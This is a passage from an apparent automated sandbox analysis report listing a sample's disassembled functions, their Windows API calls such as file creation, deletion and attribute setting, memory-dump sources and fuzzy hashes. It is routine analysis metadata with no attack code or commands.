                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFileLastPointer
                                                                                    • String ID:
                                                                                    • API String ID: 2976181284-0
                                                                                    • Opcode ID: f02fbe06cf6c8ed93969910aa2e928e58ee7a08e533afc07f5784c2431702729
                                                                                    • Instruction ID: 4b3857737dd17f2a3eadb6bbc78d664c74ec5593d7e261864ce8b88e254c7fd9
                                                                                    • Opcode Fuzzy Hash: f02fbe06cf6c8ed93969910aa2e928e58ee7a08e533afc07f5784c2431702729
                                                                                    • Instruction Fuzzy Hash: F941D1B1904321CFDB24DF15F58486AB7E6FFD4311F1C8A2DEA8583261E778ED448A91
                                                                                    Function 00721E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00721E55
                                                                                      • Part of subcall function 00723BBA: __EH_prolog.LIBCMT ref: 00723BBF
                                                                                    • _wcslen.LIBCMT ref: 00721EFD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog$_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 2838827086-0
                                                                                    • Opcode ID: 45e51e5f34de8277eb9a6336f02b1e8ba458b238469c5cc14071293aba32de38
                                                                                    • Instruction ID: 692a5524c0d33b40eb7aa5c8425a48b3b745eb9bc3f35b67fd4eb69f46346cf4
                                                                                    • Opcode Fuzzy Hash: 45e51e5f34de8277eb9a6336f02b1e8ba458b238469c5cc14071293aba32de38
                                                                                    • Instruction Fuzzy Hash: DB314B71905219DFDF15EF98D949AEEFBF6BF58300F6000A9E845A7251C73A5E00CB60
                                                                                    Function 00729DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,007273BC,?,?,?,00000000), ref: 00729DBC
                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00729E70
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$BuffersFlushTime
                                                                                    • String ID:
                                                                                    • API String ID: 1392018926-0
                                                                                    • Opcode ID: 0b73550bd56c1d18e36d8a654be4223404e7cdc20ec4cf651f54da2d3016ca21
                                                                                    • Instruction ID: 1a62628f1d2138f256cb8baf570309c8cac28b204b3236b824cf2ea2b52cc20d
                                                                                    • Opcode Fuzzy Hash: 0b73550bd56c1d18e36d8a654be4223404e7cdc20ec4cf651f54da2d3016ca21
                                                                                    • Instruction Fuzzy Hash: AB21F032248355EBC714CF34D891AABBBE4AF51704F08481CF5C583581D32DE90C9BA2
                                                                                    Function 0072966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00729F27,?,?,0072771A), ref: 007296E6
                                                                                    • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00729F27,?,?,0072771A), ref: 00729716
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: 3cdfc3c47ebc03612955d3804147d4fb20b9869d40edd695e8c18e38c3a0cb11
                                                                                    • Instruction ID: c84dbc25079a832fa0836633e22bae32a3f15d0f53cfab400dc5f2c142a5713c
                                                                                    • Opcode Fuzzy Hash: 3cdfc3c47ebc03612955d3804147d4fb20b9869d40edd695e8c18e38c3a0cb11
                                                                                    • Instruction Fuzzy Hash: 5C21BDB1104354AEE3708A65DC89FA7B7DCEB49360F044A19FA96C65D2C7B8A8848671
                                                                                    Function 00729E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00729EC7
                                                                                    • GetLastError.KERNEL32 ref: 00729ED4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFileLastPointer
                                                                                    • String ID:
                                                                                    • API String ID: 2976181284-0
                                                                                    • Opcode ID: 1e1cb210f5438271c5e599c493c24d116fa7fc034e8f99bb22c23a8efa7970ed
                                                                                    • Instruction ID: cf141fb33ffae7d850fe4ec17f7c908652f3c4040b1b4cfeec97c52057153dec
                                                                                    • Opcode Fuzzy Hash: 1e1cb210f5438271c5e599c493c24d116fa7fc034e8f99bb22c23a8efa7970ed
                                                                                    • Instruction Fuzzy Hash: A8112931A003209BD724C624D844BA6B3E9AB04370F584A29E653D25D0D378ED45C760
                                                                                    Function 00748E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 00748E75
                                                                                      • Part of subcall function 00748E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0074CA2C,00000000,?,00746CBE,?,00000008,?,007491E0,?,?,?), ref: 00748E38
                                                                                    • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00761098,007217CE,?,?,00000007,?,?,?,007213D6,?,00000000), ref: 00748EB1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocAllocate_free
                                                                                    • String ID:
                                                                                    • API String ID: 2447670028-0
                                                                                    • Opcode ID: d372a2e416fe9b1a284e8acee61186fb4302517586423626e33fd9343b404cdd
                                                                                    • Instruction ID: 08ca70a93ca3b49293cb8b3aca65591e495ada77a9327a0cfc1887a2d15971e9
                                                                                    • Opcode Fuzzy Hash: d372a2e416fe9b1a284e8acee61186fb4302517586423626e33fd9343b404cdd
                                                                                    • Instruction Fuzzy Hash: 10F0F63270123DE6CBA12A259C08F6F37588F82B70F244126F814AB1A1DF7DCD0081A3
                                                                                    Function 0073109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(?,?), ref: 007310AB
                                                                                    • GetProcessAffinityMask.KERNEL32(00000000), ref: 007310B2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$AffinityCurrentMask
                                                                                    • String ID:
                                                                                    • API String ID: 1231390398-0
                                                                                    • Opcode ID: 49412f6b15881320ed40e33c493424f1d42613377587cd579cfef6e7d1ae9e26
                                                                                    • Instruction ID: 41b39563e812a990cc8248ee986de164608fe688eda5700eb684c3d579a8af07
                                                                                    • Opcode Fuzzy Hash: 49412f6b15881320ed40e33c493424f1d42613377587cd579cfef6e7d1ae9e26
                                                                                    • Instruction Fuzzy Hash: 7AE0D833B00249A7DF0D87B49C059EB73DEEA44345B508175E407E7102F978DE418A60
                                                                                    Function 0072A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0072A325,?,?,?,0072A175,?,00000001,00000000,?,?), ref: 0072A501
                                                                                      • Part of subcall function 0072BB03: _wcslen.LIBCMT ref: 0072BB27
                                                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0072A325,?,?,?,0072A175,?,00000001,00000000,?,?), ref: 0072A532
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile$_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 2673547680-0
                                                                                    • Opcode ID: c614252f9e8cc74008ebbc67e5c6c9f94d1a0ea71fddd3ac1f9d74b03b08ec09
                                                                                    • Instruction ID: cba96f5776b4c33538940a56fe0a7accbad1e3d2c4d9cc82b31a9c2d31e0c5fe
                                                                                    • Opcode Fuzzy Hash: c614252f9e8cc74008ebbc67e5c6c9f94d1a0ea71fddd3ac1f9d74b03b08ec09
                                                                                    • Instruction Fuzzy Hash: 44F03031240319BBDF025F61EC45FDA376DAB04385F448451B949D51A0DB75DA94DA50
                                                                                    Function 0072A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DeleteFileW.KERNELBASE(000000FF,?,?,0072977F,?,?,007295CF,?,?,?,?,?,00752641,000000FF), ref: 0072A1F1
                                                                                      • Part of subcall function 0072BB03: _wcslen.LIBCMT ref: 0072BB27
                                                                                    • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0072977F,?,?,007295CF,?,?,?,?,?,00752641), ref: 0072A21F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: DeleteFile$_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 2643169976-0
                                                                                    • Opcode ID: f46e8a7bfd2712bca5d3abd9d827f131963617eb37aaf9290405b5f8e1929f3b
                                                                                    • Instruction ID: 79aaabc7f9f9e2ce148925b8ea89e277b2d254c419d97f9ebd9abcb2c3301f4f
                                                                                    • Opcode Fuzzy Hash: f46e8a7bfd2712bca5d3abd9d827f131963617eb37aaf9290405b5f8e1929f3b
                                                                                    • Instruction Fuzzy Hash: E3E09271140319BBEB015F60EC45FE9379CBB083C2F488021B948D20A0EB6ADE84DA64
                                                                                    Function 0073AC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GdiplusShutdown.GDIPLUS(?,?,?,?,00752641,000000FF), ref: 0073ACB0
                                                                                    • CoUninitialize.COMBASE(?,?,?,?,00752641,000000FF), ref: 0073ACB5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: GdiplusShutdownUninitialize
                                                                                    • String ID:
                                                                                    • API String ID: 3856339756-0
                                                                                    • Opcode ID: eb2b9a54fc29aa3b98b1fd11e3744021618468e749974aef49012dd9c0516a77
                                                                                    • Instruction ID: 9034b1d9ab03e654113798994393d5fdc73ed9380af6dd4dabee27f42cd21f46
                                                                                    • Opcode Fuzzy Hash: eb2b9a54fc29aa3b98b1fd11e3744021618468e749974aef49012dd9c0516a77
                                                                                    • Instruction Fuzzy Hash: 16E06572544A50EFC7019F5DDC46B45FBA8FB48F61F104365F416D3BA1CB786801CA94
                                                                                    Function 0072A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,0072A23A,?,0072755C,?,?,?,?), ref: 0072A254
                                                                                      • Part of subcall function 0072BB03: _wcslen.LIBCMT ref: 0072BB27
                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0072A23A,?,0072755C,?,?,?,?), ref: 0072A280
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile$_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 2673547680-0
                                                                                    • Opcode ID: 601ed5c7c0d26c8c25ca94987f67d76d46da0b16703cd388c6548fd323f8274d
                                                                                    • Instruction ID: 5ae3e1a2b0fb63d4201c8e6269cadd76eb00de1bedcd54b7dc5bbef19a03d272
                                                                                    • Opcode Fuzzy Hash: 601ed5c7c0d26c8c25ca94987f67d76d46da0b16703cd388c6548fd323f8274d
                                                                                    • Instruction Fuzzy Hash: 3EE09271500224ABCB10AB64DC09BD97798AB083E2F048261FD48E31E0D778DE44CAA0
                                                                                    Function 0073DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _swprintf.LIBCMT ref: 0073DEEC
                                                                                      • Part of subcall function 00724092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007240A5
                                                                                    • SetDlgItemTextW.USER32(00000065,?), ref: 0073DF03
                                                                                      • Part of subcall function 0073B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0073B579
                                                                                      • Part of subcall function 0073B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0073B58A
                                                                                      • Part of subcall function 0073B568: IsDialogMessageW.USER32(00010486,?), ref: 0073B59E
                                                                                      • Part of subcall function 0073B568: TranslateMessage.USER32(?), ref: 0073B5AC
                                                                                      • Part of subcall function 0073B568: DispatchMessageW.USER32(?), ref: 0073B5B6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                    • String ID:
                                                                                    • API String ID: 2718869927-0
                                                                                    • Opcode ID: 5d23a27a2beb18cda777c4115fc134e3ec6e8877686bcce1213a946570073134
                                                                                    • Instruction ID: e9d2e10288ea8dccf6c52e76392594baebec2e8de8f0c5d20bee98c4a891d019
                                                                                    • Opcode Fuzzy Hash: 5d23a27a2beb18cda777c4115fc134e3ec6e8877686bcce1213a946570073134
                                                                                    • Instruction Fuzzy Hash: F0E09BB140035866EF11AB65DC0EF9E3B6C5B05785F044551B601DA0E3D97CD6508766
                                                                                    Function 0073081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00730836
                                                                                    • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0072F2D8,Crypt32.dll,00000000,0072F35C,?,?,0072F33E,?,?,?), ref: 00730858
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673219544.0000000000753000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000075E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000765000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000776000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.000000000077E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673327473.0000000000782000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.1673422019.0000000000783000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_720000_f5Mb10zb.jbxd
                                                                                    Similarity
                                                                                    • API ID: DirectoryLibraryLoadSystem
                                                                                    • String ID:
                                                                                    • API String ID: 1175261203-0
                                                                                    • Opcode ID: 6ca5108a91eea07a47f6ee6ef45d7a28f66b1f743378966ae3b7211152f36c85
                                                                                    • Instruction ID: 562adc55722b91d9543348f7443dad170f70e5512cd24207f1d78248e56db58e
                                                                                    • Opcode Fuzzy Hash: 6ca5108a91eea07a47f6ee6ef45d7a28f66b1f743378966ae3b7211152f36c85
                                                                                    • Instruction Fuzzy Hash: F9E048B6500228ABDB11A795DC09FDA77ACEF093D2F044065B649D2055DABCDA84CBF4
                                                                                    Function 0073A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0073A3DA
                                                                                    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0073A3E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.1673127332.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                    • Associated: 00000001.00000002.1673111328.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
